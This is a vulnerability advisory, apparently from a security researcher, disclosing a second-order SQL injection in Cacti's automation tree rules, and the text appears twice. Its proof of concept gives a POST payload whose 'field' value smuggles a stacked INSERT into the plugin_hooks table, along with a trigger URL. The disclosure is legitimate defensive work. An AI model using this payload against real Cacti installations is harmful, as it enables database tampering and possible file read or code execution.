Summary
Some of the data stored in automation_tree_rules.php is not thoroughly checked and is used to concatenate the SQL statement in
create_all_header_nodes() function from lib/api_automation.php , finally resulting in SQL injection.
Details
1. store dirty data
The writing of dirty data can be done from automation_tree_rules_form_save() function in automation_tree_rules.php. This requires administrator privileges of Automation .


In the database, the field field of this table are controllable and all is set to varchar 255, which can inject a lot of content.

2. read and use dirty data to concatenate the SQL statement
The attack starts with the form_action() function in host.php. Calling automation_update_device() function.

Alternatively, starting from the form_action() function in graphs.php . Calling automation_execut_graph_create_tree() function.

These two methods require administrator privileges respectively: Sites/Devices/Data, Graphs.

Finally arriving at lib/api.automation.php. when reading the field data of automation_tree_rule_items in database, variable $sql is not checked and concatenated directly, resulting in SQL injection.


PoC
1. store dirty data
POST access automation_tree_rules.php and submit the following data:
- 'save_component_automation_tree_rule_item' => 1,
- 'item_id'=>1,
- 'id'=>1,
- 'sequence'=>100,
- 'field'=>"1;INSERT INTO plugin_hooks VALUES (3,'a','a','../../myVul/FileIncludeofgraph_image/test.php','.','a');#",
- 'sort_type'=>1,
- 'search_pattern'=>'TAINT',
- 'action'=>'save',
- '__csrf_magic'=> ''
check field in automation_match_rule_items table.

2. use dirty data to concatenate the SQL statement
GET access : "http://ip:port/host.php?action=actions&drp_action=6&selected_items=[1]".

Impact
Using SQL based secondary injection technology, attackers can modify the contents of the Cacti database, and based on the modified content, it may be possible to achieve further impact, such as arbitrary file reading, and even remote code execution through arbitrary file writing.
Researcher: ISHGARD-2, USTC
Summary
Some of the data stored in
automation_tree_rules.phpis not thoroughly checked and is used to concatenate the SQL statement increate_all_header_nodes()function fromlib/api_automation.php, finally resulting in SQL injection.Details
1. store dirty data
The writing of dirty data can be done from


automation_tree_rules_form_save()function inautomation_tree_rules.php. This requires administrator privileges of Automation .In the database, the

fieldfield of this table are controllable and all is set to varchar 255, which can inject a lot of content.2. read and use dirty data to concatenate the SQL statement
The attack starts with the

form_action()function inhost.php. Callingautomation_update_device()function.Alternatively, starting from the

form_action()function ingraphs.php. Callingautomation_execut_graph_create_tree()function.These two methods require administrator privileges respectively: Sites/Devices/Data, Graphs.

Finally arriving at


lib/api.automation.php. when reading thefielddata ofautomation_tree_rule_itemsin database, variable$sqlis not checked and concatenated directly, resulting in SQL injection.PoC
1. store dirty data
POST access
automation_tree_rules.phpand submit the following data:check
fieldinautomation_match_rule_itemstable.2. use dirty data to concatenate the SQL statement
GET access : "http://ip:port/host.php?action=actions&drp_action=6&selected_items=[1]".

Impact
Using SQL based secondary injection technology, attackers can modify the contents of the Cacti database, and based on the modified content, it may be possible to achieve further impact, such as arbitrary file reading, and even remote code execution through arbitrary file writing.
Researcher: ISHGARD-2, USTC